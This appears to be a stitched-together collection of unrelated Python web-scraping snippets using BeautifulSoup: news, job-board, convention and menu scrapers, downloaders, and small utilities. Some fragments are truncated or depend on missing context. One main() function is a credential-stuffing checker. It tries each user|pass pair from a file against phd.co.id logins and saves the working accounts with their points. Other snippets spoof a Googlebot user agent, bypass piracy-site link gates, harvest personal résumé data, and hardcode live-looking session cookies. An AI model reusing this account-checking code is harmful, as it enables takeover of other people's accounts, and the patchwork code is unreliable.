def scrape_wsj():
    # Timestamp the run, then fetch the WSJ business page while presenting
    # a Googlebot user agent.
    time = datetime.datetime.now()
    print(f'Scraping from WSJ {time.time()}')
    session = requests.Session()
    session.headers = {
        "User-Agent": "Googlebot/2.1 (+http://www.google.com/bot.html)"
    }
    url = "https://www.wsj.com/news/business?mod=hp_lista_strap"
    soup = Bs(session.get(url, verify=False).content, "html.parser")
    cadru_news1 = soup.find_all(
        "article", {
            "class":
            "WSJTheme--story--XB4V2mLz WSJTheme--story-padding--1gRL3tuf "
            "WSJTheme--border-bottom--s4hYCt0s"
        })
    cadru_news2 = soup.find_all(
        "article", {
            "class":
            "WSJTheme--story--XB4V2mLz WSJTheme--story-padding--1gRL3tuf "
            "WSJTheme--media-margin-bottom--1bIRFuDR "
            "WSJTheme--border-bottom--s4hYCt0s"
        })
    for article in cadru_news1[1:]:
        try:
            title = article.find("h3").text
            paragraph = article.find("p").text
            url = article.find("a").get("href")
            img = article.find("img").get("src")
            new_head_wsj1 = Headline()
            new_head_wsj1.title = title
            # Truncate the lead paragraph to 200 chars, then cut back to the
            # last complete sentence.
            new_head_wsj1.start_paragraph = Truncator(paragraph).chars(200)
            new_head_wsj1.start_paragraph = "".join(
                new_head_wsj1.start_paragraph.rsplit(".")[:-1]) + "."
            new_head_wsj1.url = url
            new_head_wsj1.head_img = img
            new_head_wsj1.save()
            print(f"Headline created from WSJ: {new_head_wsj1.title}")
        except (ValidationError, IntegrityError, AttributeError, IndexError):
            continue
    for article2 in cadru_news2:
        try:
            title2 = article2.find("h3").text
            paragraph2 = article2.find("p").text
            url2 = article2.find("a").get("href")
            img2 = article2.find("img").get("src")
            new_head_wsj2 = Headline()
            new_head_wsj2.title = title2
            new_head_wsj2.start_paragraph = Truncator(paragraph2).chars(200)
            new_head_wsj2.start_paragraph = "".join(
                new_head_wsj2.start_paragraph.rsplit(".")[:-1]) + "."
            new_head_wsj2.url = url2
            new_head_wsj2.head_img = img2
            new_head_wsj2.save()
            print(f"Headline created from WSJ: {new_head_wsj2.title}")
        except (ValidationError, IntegrityError, AttributeError, IndexError):
            continue
def get_features(self, ref):
    """Return features from resume data."""
    resume_page = requests.get(ref, headers=self.headers)
    soup = Bs(resume_page.text, 'html.parser')
    try:
        title = soup.find('title').extract().text
    except (TypeError, ValueError, AttributeError):
        title = 'null'
    try:
        gender = soup.find('span', {
            'data-qa': 'resume-personal-gender'
        }).extract().text
    except (TypeError, ValueError, AttributeError):
        gender = 'null'
    try:
        city = soup.find('span', {
            'data-qa': 'resume-personal-address'
        }).extract().text
    except (TypeError, ValueError, AttributeError):
        city = 'null'
    try:
        age = int(
            soup.find('span', {
                'data-qa': 'resume-personal-age'
            }).extract().text[:2])
    except (TypeError, ValueError, AttributeError):
        age = 0
    try:
        # Extract the salary text once (extract() removes the node, so the
        # original re-find fallback could never succeed), then try a
        # three-digit figure before falling back to two digits.
        salary_text = soup.find('span', {
            'data-qa': 'resume-block-salary'
        }).extract().text
        try:
            salary = int(salary_text[0:3])
        except ValueError:
            salary = int(salary_text[0:2])
    except (TypeError, ValueError, AttributeError):
        salary = 0
    try:
        # 'лет' is the Russian word for "years"; the slice trims the label
        # surrounding the experience figure.
        experience_s = soup.find('span', {
            'class': 'resume-block__title-text resume-block__title-text_sub'
        }).extract().text
        experience = str(
            experience_s)[12:re.search('лет', str(experience_s)).end() - 4]
    except (TypeError, ValueError, AttributeError):
        experience = 'null'
    try:
        last_job = soup.find('div', {
            'class': 'resume-block__sub-title'
        }).extract().text
    except (TypeError, ValueError, AttributeError):
        last_job = 'null'
    return title, gender, city, age, salary, experience, last_job
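# Usage sketch (hypothetical: `scraper` is an instance of the class that owns
# get_features, with self.headers already set, and `resume_url` points at a
# page using the hh.ru-style data-qa attributes the selectors above expect):
# title, gender, city, age, salary, experience, last_job = \
#     scraper.get_features(resume_url)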
def crawl(self):
    self.driver.get(self.url)
    self.driver.maximize_window()
    now = datetime.datetime.now()
    reg_date = now.strftime('%Y-%m-%d %H:%M:%S')
    wait = WebDriverWait(self.driver, 10).until(
        EC.presence_of_all_elements_located(
            (By.XPATH, '//*[@id="sub_wrapper"]/div/div[2]/section/div[1]/h3')))
    # Search from 2003-01, jump to the last page to read the page count,
    # then return to the first page.
    self.driver.find_element_by_xpath('//*[@id="sYear"]').send_keys('2003')
    self.driver.find_element_by_xpath('//*[@id="sMonth"]').send_keys('01')
    self.driver.find_element_by_xpath('//*[@id="btn_search"]').click()
    self.driver.find_element_by_xpath('//*[@id="btn_last"]').click()
    page_length = self.driver.find_element_by_xpath(
        '//*[@id="pageLinkForm"]/strong').text
    pages = int(page_length)
    self.driver.find_element_by_xpath('//*[@id="btn_first"]').click()
    cnt = 2
    for page in range(1, pages + 1):
        time.sleep(1)
        content_length = self.driver.find_elements_by_xpath(
            '//*[@id="sub_wrapper"]/div/div[2]/section/div[2]/div[3]/table/tbody/tr'
        )
        for content in range(1, len(content_length) + 1):
            # Click the content link to open the detail popup.
            self.driver.find_element_by_xpath(
                '//*[@id="sub_wrapper"]/div/div[2]/section/div[2]/div[3]/table/tbody/tr[{content}]/td[3]/a'
                .format(content=content)).click()
            wait = WebDriverWait(self.driver, 10).until(
                EC.presence_of_all_elements_located(
                    (By.XPATH, '//*[@id="pop_detailSche"]/h4')))
            time.sleep(2)
            contents = self.driver.find_elements_by_xpath(
                '//*[@id="pop_detailSche"]')
            html = self.driver.page_source
            self.soup = Bs(html, 'html.parser')
            data = self.soup.select('#pop_detailSche')
            # _dict is assumed to be a module-level dict in the original file.
            _dict['convention_name'] = 'iccjeju'
            _dict['contents'] = contents[0].text
            _dict['page_source'] = str(data)
            _dict['source_url'] = 'None'
            _dict['home_page'] = self.url
            _dict['reg_date'] = reg_date
            self.content_insert(_dict)
            # Close the detail popup.
            self.driver.find_element_by_xpath(
                '//*[@id="pop_detailSche"]/div[3]/a').click()
            time.sleep(1)
        # cnt indexes the pager links; every eleventh step moves to the
        # next block of page links.
        if cnt % 11 == 0:
            print('Moving to the next page block')
            cnt = 2
            self.driver.find_element_by_xpath('//*[@id="btn_next"]').click()
            time.sleep(1)
            WebDriverWait(self.driver, 10).until(
                EC.presence_of_element_located(
                    (By.XPATH,
                     '//*[@id="sub_wrapper"]/div/div[2]/section/div[1]/h3')))
        else:
            cnt += 1
            print('Moving to page {cnt}'.format(cnt=page))
            self.driver.find_element_by_xpath(
                '//*[@id="pageLinkForm"]/a[{cnt}]'.format(cnt=cnt)).click()
            time.sleep(1)
            WebDriverWait(self.driver, 10).until(
                EC.presence_of_element_located(
                    (By.XPATH,
                     '//*[@id="sub_wrapper"]/div/div[2]/section/div[1]/h3')))
from urllib.request import urlopen
from bs4 import BeautifulSoup as Bs

page_html = urlopen(
    'https://stepik.org/media/attachments/lesson/209719/2.html').read().decode(
        'utf-8')
# Collect the text between every <code>...</code> pair.
page_html_list = page_html.split('</code>')
page_html_list_res = []
for i in page_html_list:
    if '<code>' in i:
        page_html_list_res.append(i[i.find('<code>') + len('<code>'):])

# Find the three most common <code> snippets by repeated linear scans
# (collections.Counter.most_common(3) would do the same in one call).
a_set = set(page_html_list_res)
most_com = y = q = 0
most_list = []
while q != 3:
    for i in a_set:
        x = page_html_list_res.count(i)
        if x > y:
            y = x
            most_com = i
    most_list.append(most_com)
    a_set.discard(most_com)
    x = y = 0
    q += 1
print(most_list)

content_soup = Bs(page_html, 'lxml')
print(content_soup)
def bypass(url, judul):
    cc = 1
    req = ses.get(url)
    bs = Bs(req.text, 'html.parser')
    link = bs.find('a', {'class': 'btn btn-success'})['href']
    req2 = ses.get(link)
    # Follow the frame redirect chain to reach the real host page.
    rg = re.findall(r'<frame src="(.*)">', req2.text)[0]
    blin = link.split('/')[2]
    req3 = ses.get(f"http://{blin}{rg}")
    bs2 = Bs(req3.text, 'html.parser')
    link2 = bs2.find('a', {'target': '_parent'})['href']
    req4 = ses.get(f"http://{blin}{link2}")
    rg2 = re.findall(r'post\("(.*?)", {', req4.text)[0]
    blin2 = req4.url.split('/')[2]
    head = {
        'Host': blin2,
        'accept': '*/*',
        'origin': f'http://{blin2}',
        'x-requested-with': 'XMLHttpRequest',
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '
                      'AppleWebKit/537.36 (KHTML, like Gecko) '
                      'Chrome/74.0.3729.169 Safari/537.36',
        'content-type': 'application/x-www-form-urlencoded;charset=UTF-8',
        'referer': link2,
        'accept-encoding': 'gzip, deflate, br',
        'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
    }
    req5 = ses.post(f"http://{blin2}{rg2}", headers=head)
    try:
        rg3 = re.findall(r'https://layarkacaxxi.icu/f/(.*?)"', req5.text)[0]
    except IndexError:
        print("\n !Failed to bypass")
        tan = input(
            "[?] Do you want to continue to the layarkaca21 website (y/n) ")
        if tan.lower() == 'y':
            click.launch(info['title'][pil - 1][1])
            return True
        else:
            sys.exit("okay bye bye:*")
    req6 = ses.get(f'https://layarkacaxxi.icu/f/{rg3}')
    try:
        rg4 = re.findall(r"post\('(.*?)', ", req6.text)[0]
    except IndexError:
        raise Exception("\nDCMATakedown: video is not available")
    req7 = ses.post(f'https://layarkacaxxi.icu{rg4}')
    js = json.loads(req7.text)
    print("\n\t[ Resolution ]")
    for x in js['data']:
        print(f"{cc}. {x['label']}")
        cc += 1
    lih = int(input("_> choose: "))
    if lih <= 0:
        print("index out of range")
        return True
    downld2(js['data'][lih - 1]['file'],
            f"{judul} {js['data'][lih-1]['label']}")
import requests
from bs4 import BeautifulSoup as Bs
import re
from time import sleep, gmtime, strftime

INDEX = 'XXXXXX'  # your student index number here
ROK = '2018'
WWW = 'http://www.cs.put.poznan.pl/amichalski/deklaratywne/index.html'

text = 'Grade not entered :('
while text == 'Grade not entered :(':
    # Collect every link on the course page whose href mentions the year.
    found = map(
        lambda x: x['href'],
        Bs(requests.get(WWW).text,
           'html.parser').find_all(name='a', href=re.compile(ROK)))
    with open('check.txt', 'r') as file:
        content = file.read().splitlines()
    text = 'Grade not entered :('
    for f in found:
        if f not in content:
            txt_file = requests.get(f).text
            if INDEX in txt_file:
                i = txt_file.index(INDEX)
                text = "GRADE ENTERED: " + txt_file[i + 13:i + 16]
                break
            else:
                content.append(f)
    with open('check.txt', 'w') as file:
        file.write('\n'.join(content))
    print(text, strftime("%Y-%m-%d %H:%M:%S", gmtime()))
    sleep(60)  # avoid hammering the server between checks
def download(url, judul):
    print("#", re.findall(r'. (.*)', judul)[0])
    req3 = ses.get('https://an1.com' + url)
    rg = re.findall(r'href=(.*)><input', req3.text)
    # Resolve bit.ly shorteners to the real host first.
    if "bit.ly" in rg[0]:
        rq = requests.get(rg[0]).url
        rg = rq.split()
    # Pick a direct link, or unwrap the supported file hosts.
    if "files.an1.net" in rg[0]:
        link = rg[0]
    elif '.apk' in rg[0] or '.zip' in rg[0]:
        link = rg[0]
    elif "www.4sync.com" in rg[0]:
        req4 = requests.get(rg[0])
        bs3 = Bs(req4.text, 'html.parser')
        link = bs3.find('input', {'class': 'jsDLink'})['value']
    elif "racaty.net" in rg[0]:
        reqs = requests.get(rg[0])
        bss = Bs(reqs.text, 'html.parser')
        op = bss.find('input', {'name': 'op'})['value']
        id = bss.find('input', {'name': 'id'})['value']
        rep = requests.post(rg[0], data={'op': op, 'id': id})
        bss2 = Bs(rep.text, 'html.parser')
        link = bss2.find('a', {'id': 'uniqueExpirylink'})['href']
    else:
        bps = ses.get(rg[0]).url
        nya = input(
            f"[Sorry] we do not support the download link "
            f"{re.findall(r'https://(.*)/', bps)} yet\n"
            "[?] Do you want to open that link (y/n) ")
        if nya.lower() == 'y':
            click.launch(rg[0])
        return True
    print(f"{rg}\n")

    # Downloading
    file = re.findall(r'Download (.*) ', judul)[0]
    count = 1
    response = requests.get(link, stream=True)
    start = time.time()
    total_length = response.headers.get('content-length')
    with open(f'result/{file.replace("/", ",")}', 'wb') as save:
        if total_length is None:
            print("\n[Warn] Download FAILED")
            tan = input(
                "[?] Do you want to continue to the android-1.com website (y/n) ")
            if tan.lower() == 'y':
                click.launch('https://an1.com' + url)
            else:
                sys.exit("okay bye bye:*")
        else:
            dlw = 0
            total_length = int(total_length)
            cusi = 512
            for data in response.iter_content(chunk_size=cusi):
                durasi = time.time() - start
                if durasi == 0:
                    durasi = 0.1
                ges = round((dlw / total_length) * 100)
                dsiz = int(count * cusi)
                sped = int((dsiz / 1024) / durasi)
                dlw += len(data)
                save.write(data)
                # Render a 15-segment progress bar with percent and speed.
                done = int(15 * dlw / total_length)
                print(end=f"\r\033[97m[\033[92m{'>'*done}\033[91m{'='*(15-done)}\033[97m] "
                          f"{ges}%, {sped} KB/s, {round(dsiz/(1024*1024), 2)} MB ",
                      flush=True)
                count += 1
            print("\n[OK] file saved in result\n")
def __init__(self, url):
    self.url = url
    self.db = database.Database('crawling_musinsa')
    # Fetch the page and set up BeautifulSoup.
    res = rq.get(self.url)
    self.html = Bs(res.content, 'html.parser')
def crawl(self):
    self.driver.get(self.url.format(page=1))
    self.driver.maximize_window()
    now = datetime.datetime.now()
    reg_date = now.strftime('%Y-%m-%d %H:%M:%S')  # registration timestamp
    # Work out the total page count: click the "last page" link if present,
    # otherwise read the highest page number shown in the pager.
    try:
        self.driver.find_element_by_xpath(
            '//*[@id="content"]/div[2]/div[3]/ul/li[14]/a').click()
        page_length = self.driver.find_element_by_xpath(
            '//*[@id="content"]/div[2]/div[3]/ul/li/strong').text
        pages = int(page_length)
    except NoSuchElementException:  # selenium.common.exceptions
        a = self.driver.find_elements_by_xpath(
            '//*[@id="content"]/div[2]/div[3]/ul/li')
        pages_length = self.driver.find_element_by_xpath(
            '//*[@id="content"]/div[2]/div[3]/ul/li[{}]/a'.format(
                len(a) - 2)).text
        pages = int(pages_length)
    for page in range(1, pages + 1):
        self.driver.get(self.url.format(page=page))
        content_length = self.driver.find_elements_by_xpath(
            '//*[@id="content"]/div[2]/fieldset/table/tbody/tr')
        for content in range(1, len(content_length) + 1):
            print('Crawling page {page}, post {content}'.format(
                page=page, content=content))
            url = self.driver.find_elements_by_xpath(
                '//*[@id="content"]/div[2]/fieldset/table/tbody/tr[{content}]/td[3]/a'
                .format(content=content))
            self.tempUrl = url[0].get_attribute('href')
            time.sleep(1)
            try:
                self.driver.find_element(
                    By.CSS_SELECTOR,
                    '#content > div.schedule > fieldset > table > tbody > '
                    'tr:nth-child({content}) > td.subject2 > a'.format(
                        content=content)).click()
                # Some posts pop an "invalid access" alert instead of opening.
                WebDriverWait(self.driver, 2).until(EC.alert_is_present(),
                                                    'Invalid access')
                alert = self.driver.switch_to.alert
                alert.accept()
                print("alert accepted")
            except TimeoutException:
                # No alert appeared, so the detail page loaded; scrape it.
                contents = self.driver.find_elements_by_xpath(
                    '//*[@id="content"]/div[2]/div')
                html = self.driver.page_source
                self.soup = Bs(html, 'html.parser')
                data = self.soup.select('#content > div.schedule > div')
                _dict['convention_name'] = 'kintex'
                _dict['contents'] = contents[0].text
                _dict['page_source'] = str(data)
                _dict['source_url'] = self.tempUrl
                _dict['home_page'] = self.url
                _dict['reg_date'] = reg_date
                self.content_insert(_dict)
                self.driver.back()
                time.sleep(1)
def extract_profile(raw_html):
    # The original body parsed the HTML but never built `profile`; the real
    # field selectors are unknown, so a minimal placeholder extraction is
    # sketched here.
    parser = Bs(raw_html, 'html.parser')
    profile = {
        'title': parser.title.string if parser.title else None,
        'text': parser.get_text(strip=True),
    }
    return profile
def fetch_content(url):
    print(f'\nDownloading from {url}\n')
    page = requests.get(url)
    soup = Bs(page.content, 'html.parser')
    return soup
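# Usage sketch for fetch_content: example.com is a placeholder page, and this
# assumes requests and Bs are imported at module level as elsewhere in this
# file; any reachable HTML page works the same way.
if __name__ == '__main__':
    demo_soup = fetch_content('https://example.com')
    print(demo_soup.title.string)
    print([a.get('href') for a in demo_soup.find_all('a')])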
import requests as Rq
from bs4 import BeautifulSoup as Bs

link = 'http://www.pfl.unicamp.br/Rest/view/site/cardapio.php'
page = Rq.get(link)
# The page is served in ISO-8859-1, so tell the parser explicitly. (The
# original immediately overwrote this with a plain parse, discarding the
# encoding hint; that second parse is dropped here.)
soup = Bs(page.content, 'html.parser', from_encoding='iso-8859-1')


def formatInput(text):
    text = text.replace('\n', '')
    text = text.replace('\r', '')
    text = text.replace(': ', ':')
    text = text.replace(' - ', '-')
    text = text.strip()
    return text


rows = soup.find_all('tr')
html = []
html.append(formatInput(rows[0].getText()))
for i in range(4, 11):
    html.append(formatInput(rows[i].getText()))

print('\n\n')
print('{:^50s}'.format(html[0].split('-')[0].upper()))
print()
print('{:^50s}'.format(html[0].split('-')[1]))
print('-' * 57)
broke = []
def get_pupils_with_soup(self):
    soup = Bs(self.page.text, 'html.parser')
    s = soup.find(class_="total-users").text
    # Keep only the digits, e.g. "1 234 users" -> 1234.
    digits = [ch for ch in s if ch.isdigit()]
    return int("".join(digits))
def __init__(self, url):
    self.page = requests.get(url)
    self.soup = Bs(self.page.text, 'html.parser')
def snoopHTML(self, fpath):
    """
    Generates a data structure for the given file, describing its HTML
    elements that have an associated style.

    NOTE: Line numbers are sometimes inaccurate.

    :param fpath: str
    :return:
    """
    self._HTML_file_styles[fpath] = []
    file = open(fpath).read()
    file_lines = file.split('\n')
    soup = Bs(file, 'html.parser')
    tags = soup.find_all()
    for tag in tags:
        styles = {
            'element': '',
            'class': [],
            'id': [],
            'line_no': 0,
            'tag': ''
        }
        if tag.has_attr('class'):
            _class = tag['class']
            styles['class'].append(_class)
        elif tag.has_attr('id'):
            _id = tag['id']
            styles['id'].append(_id)
        # get open tag of element
        styles['element'] = str(tag).strip().split('\n')[0]
        # get tag
        styles['tag'] = tag.name
        # if the element has a style, record and normalize it
        if len(styles['class']) != 0 or len(styles['id']) != 0:
            self._HTML_file_styles[fpath].append(styles)
            # clean up classes: flatten the class list into '.name' selectors
            clean_classes = []
            for cgroup in styles['class']:
                for cname in cgroup:
                    clean_classes.append('.' + cname)
            # clean up ids into '#name' selectors
            clean_ids = []
            for iname in styles['id']:
                clean_ids.append('#' + iname)
            styles['class'] = clean_classes
            styles['id'] = clean_ids
            # get line number in file
            for line in enumerate(file_lines):
                line_no = line[0] + 1
                rline = str(line[1].strip())
                opTag = '<' + styles['tag']
                # check if matched tag on class
                if len(styles['class']) != 0:
                    if opTag in rline and styles['class'][0][1:] in rline:
                        styles['line_no'] = line_no
                # check if matched tag on id
                elif len(styles['id']) != 0:
                    if opTag in rline and styles['id'][0][1:] in rline:
                        styles['line_no'] = line_no
def scorecard_generator(info: CricketInfo, page: str):
    soup = Bs(markup=get(url=page).text, features='html.parser')
    for scorecard in soup.find_all('a', {'data-hover': 'Scorecard'}):
        yield f'{info.HomeCenter}{scorecard.attrs["href"]}'
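# Usage sketch: scorecard_generator is lazy, so iterate it. `info` must be a
# CricketInfo whose HomeCenter is the site's base URL; the results-page URL
# below is a placeholder, not a real endpoint.
# for scorecard_url in scorecard_generator(info, 'https://example.com/results'):
#     print(scorecard_url)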
def main():
    # NOTE: this snippet is Python 2 (raw_input, cookielib, mechanize's
    # Browser); the color constants C, W, H, A, M and banner() are assumed to
    # be defined elsewhere in the original file.
    live = []
    os.system('clear')
    print(C + 'Subscribe to my YT' + W + ' channel first!' + C + ' :V')
    sleep(1.5)
    os.system(
        'xdg-open https://www.youtube.com/channel/UCzsADl8XRJeZXJ6CKZLX5KQ')
    os.system('clear')
    banner()
    print
    print
    try:
        empas = raw_input('' + C + 'Enter file' + W + ' (' + H + ' Ex :' + C +
                          ' Empas.txt' + W + ') : ')
        print
        print('' + C + '-------------- ' + W + 'Starting' + C +
              ' --------------')
        print
        a = open(empas).readlines()
        for x in a:
            br = Browser()
            cokie = cookielib.LWPCookieJar()
            br.set_handle_equiv(True)
            br.set_handle_gzip(True)
            br.set_handle_redirect(True)
            br.set_handle_referer(True)
            br.set_handle_robots(False)
            br.set_cookiejar(cokie)
            br.addheaders = [
                ("Origin", "https://www.phd.co.id"),
                ("User-Agent",
                 "Mozilla/5.0 (Linux; Android 5.1.1; AFTT Build/LVY48F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/49.0.2623.10"
                 ),
                ("Referer", "https://www.phd.co.id/en/users/login/1"),
                ("Accept",
                 "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
                 )
            ]
            us = x.strip().split('|')[0]
            ps = x.strip().split('|')[1]
            url = 'https://www.phd.co.id/en/users/login/1'
            br.open(url)
            br.select_form(nr=0)
            br.form['username'] = str(us)
            br.form['password'] = str(ps)
            # NOTE: the credential interpolations below were masked ('******')
            # in the source; `us` / `ps` are the obvious reconstruction.
            if br.submit().geturl() == 'https://www.phd.co.id/en/users/welcome':
                x = br.open('https://www.phd.co.id/en/accounts').read()
                y = Bs(x, 'html.parser')
                z = y.find('li', {'class': 'owner-poin'}).text
                print('' + H + '[' + W + 'LIVE' + H + '] ' + W + 'USER : ' +
                      us + ' | ' + W + 'PASS : ' + ps + ' POIN : ' +
                      str(z[6:]))
                live.append('[ LIVE ] [ USER : ' + us + ' | PASS : ' + ps +
                            ' ] [ POIN : ' + str(z[6:]) +
                            ' ] Checked On https://github.com/Fukur0-3XP/PHD')
            else:
                print('' + A + '[' + W + 'ERROR' + A + '] ' + W + 'USER : ' +
                      us + ' | ' + W + 'PASS : ' + ps)
        b = '\n'.join(live)
        c = open('Live.txt', 'w')
        c.write(b)
        print
        print('' + C + '----------- ' + W + 'Done & Results' + C +
              ' -----------')
        print
        print(W + 'Live results : ' + C + str(len(live)))
        print(W + 'Results saved to file "' + C + 'Live.txt' + W + '"')
        print
        c.close()
    except IOError:
        print
        print(M + 'File not found!')
        print
def pars(link):
    response = requests.get(link)
    return Bs(response.text, "html.parser")
html_doc = """ <html><head><title>Imperial</title></head> <body> <p class="title"><b>Atletica Imperial</b></p> <p class="story">Atletica de S.I criada em 2017. Temos: <a href="www.imperial.com/blusas" class="prod" id="link1">Blusas</a>, <a href="www.imperial.com/canecas" class="prod" id="link2">Canecas</a> e <a href="www.imperial.com/bones" class="prod" id="link3">Bones</a>; Filie-se.</p> <p class="story">...</p> """ soup = Bs(html_doc, 'html.parser') print(soup.prettify()) print(soup.title) print(soup.title.name) print(soup.title.string) print(soup.title.parent.name) print(soup.p) print(soup.p['class'])
        # (excerpt: the enclosing loop/def header of readUAndV is missing
        # from this fragment; it accumulates per-rule parameters produced
        # by setOfRule)
        tmp_rel_a, tmp_rel_b, tmp_rel_c, tmp_img_a, tmp_img_b, tmp_img_c = \
            setOfRule(U, V, ids, ImgTraining, HodTraining)
        ids += 1
        rel_a = np.vstack((rel_a, tmp_rel_a))
        rel_b = np.vstack((rel_b, tmp_rel_b))
        rel_c = np.vstack((rel_c, tmp_rel_c))
        img_a = np.vstack((img_a, tmp_img_a))
        img_b = np.vstack((img_b, tmp_img_b))
        img_c = np.vstack((img_c, tmp_img_c))
    return rel_a, rel_b, rel_c, img_a, img_b, img_c


if __name__ == "__main__":
    # Read the parameter c from config.xml via BeautifulSoup's XML parser.
    with open('config.xml', 'r') as f:
        data = f.read()
    Bs_data = Bs(data, 'xml')
    c = int(Bs_data.c.contents[0])

    folderImg = os.path.join('Data', os.path.join('Training Data', 'gray'))
    folderHod = os.path.join('Data', os.path.join('Training Data', 'hod'))
    # Normalize 8-bit image data to [0, 1].
    HodTraining = readHodImg(folderHod) / 255
    ImgTraining = readDataImg(folderImg) / 255
    folderU = 'U'
    folderV = 'V'
    rel_a, rel_b, rel_c, img_a, img_b, img_c = readUAndV(
        folderU, folderV, ImgTraining, HodTraining, c)
    # final_rel_a = np.empty((0, 1))
    # final_img_a = np.empty((0, 1))
    # final_rel_b = np.empty((0, 1))
    # final_img_b = np.empty((0, 1))
    # final_rel_c = np.empty((0, 1))
    # final_img_c = np.empty((0, 1))
def parse_bs(texto: str) -> Bs:
    """Turn text into a BeautifulSoup object."""
    return Bs(texto, 'html.parser')
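# Minimal usage sketch for parse_bs; the HTML literal is illustrative only.
demo = parse_bs('<p class="destaque">exemplo</p>')
print(demo.p['class'])    # ['destaque']
print(demo.p.get_text())  # exemplo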
def getAllForms(self):
    """Search the target page's HTML for <form> tags."""
    soup = Bs(requests.get(self.url).content, "html.parser")
    return soup.find_all("form")
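# Usage sketch (hypothetical: `scanner` is an instance of the class that owns
# getAllForms, constructed with a target url). Tag.get is the standard
# BeautifulSoup accessor for attributes that may be absent.
# for form in scanner.getAllForms():
#     print(form.get('action'), form.get('method', 'get'))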
import requests
from bs4 import BeautifulSoup as Bs

URL_TEMPLATE = "https://www.work.ua/ru/jobs-odesa/?page=2"

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36',
    'cookie': 'plastikovye-vospominaniya=1477.11; _ga=GA1.2.324220759.1581889231; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6ImFadlVRWnY3aTBtTFhyUFI3ZmtoMEE9PSIsInZhbHVlIjoiNzhSK0R2eGdOMVBJTE5BWTBlOEt4ZUJIRmEyN2ZTQzdYODVhN3pGZUVnbm5OaStaSDVMK2V0Y0trOGlpUGRwaXVDb0FPb1wvRHNiZmxITXpFQituY0VKXC9ySXM1M3o2YmFTYTRRV2c5VzZaSEltZW1DZUFXQ252bDdwSFU1R2NFWStmYzgzaXpoVmw4M3dLVTc5RXljS2JDWWJuMXZ6VkRqYTNWdWprZFBYNVN0Zm9BYkdvRFwvUk5LUEsybU5zdW9nIiwibWFjIjoiNzE2N2YzYjBmNTc1YWUzZjA0ZWM5ZjIxMGExNzk2MTJlMjM3ODY2MGE5ZDNhMDY5ODFmZWJhNzdlMzlkZWRmYyJ9; __atssc=vk%3B5; _gid=GA1.2.999237229.1593986215; cf_chl_1=f785ed8de6ea7ef; __atuvc=48%7C25%2C45%7C26%2C9%7C27%2C32%7C28%2C6%7C29; XSRF-TOKEN=eyJpdiI6IlwvcGRWTnJJbzEzeFh5T0Y4WE01UkR3PT0iLCJ2YWx1ZSI6IlM3MWxQVElWOWt5QjM4ZGVjVFJhNDNZeENXeDJVZDd0cWpPbld3YjkwR0g2WlJqNnorQ1NaZ1lENngxWkdqT1oiLCJtYWMiOiJhMGI2NGIzMDExYWNjMDA3MTNmODhhZTIzNTcxZjU3ZWIzZjBiNjhmY2YyNjA0MTcwZjYxYzZjOTdmNmQ1ZGJmIn0%3D; laravel_session=eyJpdiI6ImhIbkVMZ2U4aTJNaVZwcnhkZHVqK1E9PSIsInZhbHVlIjoibTNNVlpnSFo3T0RJMTRnbGQrN2t3U2JVeFZ3bHVYUVdDNTVSYXZVa2FPSjRqVldJTUdjYThYQ0dhclBQWE1oSyIsIm1hYyI6ImVkMTc3NzkwMDk3NGRlYWQ1NjMwYWVjNjc1ODAzMjI2MzE2NmU1MTliOTkxMDdmNDA3ZjU4Zjc5MGMxYjI5MjIifQ%3D%3D'
}

r = requests.get(URL_TEMPLATE, headers=headers)
# Keep a local copy of the page for debugging.
with open('test.html', 'wb') as output_file:
    output_file.write(r.text.encode('utf-8'))

soup = Bs(r.text, "html.parser")
vacancies_names = soup.find_all(
    'div',
    class_='card card-hover card-visited wordwrap job-link js-hot-block')
vacancies_info = soup.find_all(
    'p', class_='overflow text-muted add-top-sm add-bottom')
# Pair each vacancy card with its description paragraph.
_vacancies = zip(vacancies_names, vacancies_info)
vacancies = {vacancies_[0]: vacancies_[1] for vacancies_ in _vacancies}
for info in vacancies.items():
    print('+++' * 10)
    print(info[0].h2.a['title'])
    print('https://www.work.ua' + info[0].a['href'])
    print(info[1].text)
    print('+++' * 10)